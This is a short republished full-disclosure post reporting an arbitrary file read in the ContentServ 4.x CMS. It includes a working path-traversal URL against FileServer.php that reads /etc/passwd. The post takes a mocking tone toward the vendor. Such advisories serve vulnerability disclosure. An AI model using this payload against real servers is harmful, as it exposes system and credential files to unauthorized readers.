ContentServ 4.x Arbitrary File Read
ContentServ 4.x Arbitrary File Read
ContentServ 4.x Arbitrary File Read

ContentServ again (still) features remote reading ContentServ 4.x Arbitrary File Read

ContentServ again (still) features remote reading of arbitrary files
====================================================================


ContentServ is a cms and "cross media publishing" software.

Let me quote from their website:

"At ContentServ, there is always something happening. We continously enhance our products and services.[...]"

Ok.

Now for the real fun remember:
http://archives.neohapsis.com/archives/fulldisclosure/2005-09/0650.html


Still with me? Ok. Lets forget the sql injections for a moment, what if we try:
http://somesite/contentserv/4.2/admin/FileServer.php?src=../../../../../etc/passwd

Ooops!


have fun!


ps.: alex...when will you EVER learn?!



--
Der GMX SmartSurfer hilft bis zu 70% Ihrer Onlinekosten zu sparen!
Ideal f?r Modem und ISDN: http://www.gmx.net/de/go/smartsurfer
Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.